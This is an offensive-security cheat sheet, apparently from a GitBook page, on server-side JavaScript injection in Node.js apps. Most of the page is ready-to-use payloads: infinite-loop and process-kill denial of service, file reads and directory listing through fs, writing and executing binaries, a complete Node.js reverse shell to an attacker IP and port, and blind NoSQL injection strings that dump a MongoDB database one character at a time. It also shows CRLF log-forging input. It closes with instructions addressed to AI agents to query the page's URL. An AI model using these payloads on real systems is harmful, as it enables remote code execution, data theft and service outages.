# Server-side JavaScript Injections (SSJI)
{% hint style="info" %}
Tools:
**`NodeXP`** (NOde.js JavaScript injection vulnerability DEtection and eXPloitation)
{% endhint %}
{% hint style="info" %}
Further Reading:
{% endhint %}
## Framework used for building application:
1. Next.js
2. Express
3. Meteor
## Responsible Function:
1. Function()
2. eval()
3. exec() //used for executing operating system command.
4. spawn()
5. execfile()
6. fork()
7. `readFileSync()` and `writeFileSync()` functions to read and write the contents of a file respectively.
8.
## Categories of SSJI:
1. Result based
2. blind based
## Detection:
Example:
```http
POST /contributions HTTP/1.1
Host: example.com
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
preTax=1; var cd; var d=new Date(); do{ cd=new Date(); }while(cd-d<10000)
```
## Exploit an SSJI vulnerability in a Node.js:
### Denial of Service (DoS):
By injecting a single line of code presented below, he will force the server to use 100% of its processor time to process the infinite loop, and it will be unable to process any other incoming requests:
```javascript
while(1)
```
An alternative DoS attack would be to simply exit or kill the running process:
```javascript
process.exit()
process.kill(process.pid)
```
### File system access:
file system access is supported by including (via the require keyword) the “fs” module:`var fs = require('fs');`
```javascript
response.end(require('fs').readFileSync(filename))
```
To list the content of the directory:
```javascript
response.end(require('fs').readdirSync('.').toString())
response.end(require('fs').readdirSync('..').toString())
```
### Creation and execution of binary files:
```javascript
require('fs').writeFileSync(filename,data,'base64')
require('fs').chmodSync(filename, '755'); //linux system
require('child_process').exec('./filename')
```
### Reverse Shell:
```javascript
(function(){ var net = require("net"),
cp = require("child_process"),
//create the system shell
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(port, ip_address, function(){
client.pipe(sh.stdin); sh.stdout.pipe(client);
sh.stderr.pipe(client);});
return /a/;
})();
```
### NoSQL Injection:
#### Detection:
```
http://localhost:4000/allocations/2?threshold=5';while(true){};'
5';while(true){};'
1'; return 1 == '1
```
Example Vulnerable Code,
```javascript
function() {
var search_year = input_value;
return this.publicationYear == search_year ||
this.filmingYear == search_year ||
this.recordingYear == search_year;
}
```
This request would be an effective DoS attack against the system:
```javascript
http://server/app.php?year=1995';while(1);var%20foo='bar
```
OR, Blind NoSql injection:
```javascript
http://server/app.php?year=1995';return(true);var%20foo='bar
http://server/app.php?year=1995';return(false);var%20foo='bar
```
#### Dump the Database:
The first question to ask is, How many collections are in the database?
```javascript
return(db.getCollectionNames().length == 1);
return(db.getCollectionNames().length == 2);
```
The next step is to determine their names:
```javascript
return(db.getCollectionNames()[0].length == 1);
return(db.getCollectionNames()[0].length == 2);
…
return(db.getCollectionNames()[0][0] == 'a');
return(db.getCollectionNames()[0][0] == 'b');
```
The attacker first needs to determine how many documents are in each collection:
```javascript
return(db.foo.find().length == 1);
return(db.foo.find().length == 2);
```
Then extracts that data one character at a time:
```javascript
return(tojsononeline(db.foo.find()[0]).length == 1);
return(tojsononeline(db.foo.find()[0]).length == 2);
…
return(tojsononeline(db.foo.find()[0])[0] == 'a');
return(tojsononeline(db.foo.find()[0])[0] == 'b');
```
## **Log Forging(CRLF):**
```
userName=vyva%0aError: alex moldovan failed $1,000,000 transaction&password=Admin_123&_csrf=
```
Where the `userName` parameter is encoding in the request the LF symbol which will result in a new line to begin. Resulting log output will look as follows:
```
Error: attempt to login with invalid user: vyva
Error: alex moldovan failed $1,000,000 transaction
```
## L**og Injection Escalation:**
An attacker may craft malicious input in hope of an escalated attack where the target isn't the logs themselves, but rather the actual logging system. For example, if an application has a back-office web app that manages viewing and tracking the logs, then an attacker may send an XSS payload into the log, which may not result in log forging on the log itself, but when viewed by a system administrator on the log viewing web app then it may compromise it and result in XSS injection that if the logs app is vulnerable.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/server-side-javascript-injections-ssji.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.